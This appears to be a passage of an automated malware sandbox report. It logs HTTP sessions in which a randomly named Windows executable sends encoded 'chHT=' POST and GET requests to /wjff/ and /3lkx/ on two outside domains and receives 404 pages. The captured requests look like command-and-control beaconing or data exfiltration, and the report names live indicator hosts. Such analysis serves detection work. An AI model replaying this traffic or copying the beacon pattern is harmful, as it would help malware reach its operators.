                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 6c 4e 47 56 6d 30 44 63 4c 74 30 78 47 38 74 76 4e 56 4f 7a 62 61 41 78 73 37 6c 77 62 4d 67 46 6d 59 43 53 76 39 75 75 5a 41 45 4f 59 43 47 71 74 39 49 65 77 56 30 33 43 30 78 51 53 78 50 44 6c 31 7a 4f 44 70 77 70 69 34 57 4e 31 67 7a 49 42 52 58 6f 36 4d 6a 38 54 4f 6e 73 2f 4f 41 58 76 6a 42 54 4c 79 77 77 62 48 4a 50 77 78 43 4a 39 58 58 39 56 74 66 6d 74 71 43 77 6e 6a 76 55 6d 69 74 6b 67 4b 68 78 33 38 47 56 6f 34 6a 42 78 6a 56 62 38 6a 77 61 50 5a 37 4c 51 4d 4e 41 6a 30 46 34 6e 6f 37 6c 65 57 64 62 59 3d
                      Data Ascii: chHT=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczlNGVm0DcLt0xG8tvNVOzbaAxs7lwbMgFmYCSv9uuZAEOYCGqt9IewV03C0xQSxPDl1zODpwpi4WN1gzIBRXo6Mj8TOns/OAXvjBTLywwbHJPwxCJ9XX9VtfmtqCwnjvUmitkgKhx38GVo4jBxjVb8jwaPZ7LQMNAj0F4no7leWdbY=
                      Sep 10, 2024 08:49:48.605144978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:48 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:48.605168104 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.4 | 49760 | 161.97.168.245 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:50.523171902 CEST | 10833 | OUT | POST /wjff/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Origin: http://www.qiluqiyuan.buzz
                      Referer: http://www.qiluqiyuan.buzz/wjff/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 55 53 69 39 56 4a 52 6b 78 72 56 45 6a 41 61 79 77 4e 6b 61 35 74 6e 38 72 37 78 2f 61 4d 4e 4f 6a 4c 30 4c 66 79 32 6e 48 71 78 41 75 35 30 75 76 70 4a 30 75 51 4d 39 65 55 35 46 35 55 4c 58 6c 73 38 6b 71 78 6a 63 47 49 66 38 74 42 74 66 42 6e 47 31 65 70 4b 5a 6d 6c 50 61 35 65 65 4f 43 55 74 76 5a 37 35 7a 64 48 66 31 68 73 62 75 6d 61 35 41 57 73 47 42 62 56 34 41 41 35 76 48 75 43 33 55 69 37 39 77 4f 73 42 6b 45 59 6c 6a 72 33 57 34 64 65 49 78 59 2f 73 62 4d 65 42 76 78 58 59 36 [TRUNCATED]
                      Data Ascii: chHT=[TRUNCATED]
                      Sep 10, 2024 08:49:51.118318081 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:51 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: W/"66cd104a-b96"
                      Content-Encoding: gzip
                      Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                      Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                      Sep 10, 2024 08:49:51.118365049 CEST | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                      Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.4 | 49761 | 161.97.168.245 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:49:53.101221085 CEST | 462 | OUT | GET /wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.qiluqiyuan.buzz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:53.716388941 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:53 GMT
                      Content-Type: text/html; charset=utf-8
                      Content-Length: 2966
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "66cd104a-b96"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                      Sep 10, 2024 08:49:53.716442108 CEST | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                      Sep 10, 2024 08:49:53.716483116 CEST | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                      Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.4 | 49762 | 172.96.191.39 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:02.898906946 CEST | 728 | OUT | POST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 4d 46 4b 49 61 65 35 5a 4b 71 34 69 4c 43 34 36 31 33 6e 64 56 4d 6c 47 57 66 30 78 4f 43 66 58 41 3d 3d
                      Data Ascii: chHT=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMMFKIae5ZKq4iLC4613ndVMlGWf0xOCfXA==
                      Sep 10, 2024 08:50:03.793545008 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:03 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.4 | 49763 | 172.96.191.39 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:05.444379091 CEST | 748 | OUT | POST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 6f 57 62 52 57 41 38 4e 2f 57 4d 4b 6f 4e 63 38 4d 78 70 75 58 71 6b 52 65 34 75 4d 6a 58 66 6d 45 3d
                      Data Ascii: chHT=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVoWbRWA8N/WMKoNc8MxpuXqkRe4uMjXfmE=
                      Sep 10, 2024 08:50:06.364757061 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:06 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.4 | 49764 | 172.96.191.39 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:07.991519928 CEST | 10830 | OUT | POST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 62 46 70 73 53 43 79 58 2f 6d 63 57 30 79 45 41 43 38 78 64 44 61 4d 34 34 79 56 35 6f 70 36 65 66 66 75 69 4f 38 33 38 6e 57 45 43 6d 6b 56 75 4f 6f 6d 48 74 61 31 31 34 72 4c 59 6b 63 41 6e 65 77 4d 43 65 56 32 5a 63 4f 79 4c 59 66 39 68 64 4b 71 4e 57 61 6e 66 51 49 6c 58 63 6b 4a 30 6a 74 55 57 67 79 46 47 4a 6e 44 72 7a 39 73 37 46 33 62 67 6a 6b 6c 45 58 59 70 43 50 36 65 75 54 42 38 69 7a 77 30 39 4e 55 47 70 44 74 33 63 58 62 4f 56 4e 51 71 4f 52 71 71 44 6b 69 42 44 36 66 7a [TRUNCATED]
                      Data Ascii: chHT= [TRUNCATED]
                      Sep 10, 2024 08:50:08.902043104 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:08 GMT
                      server: LiteSpeed
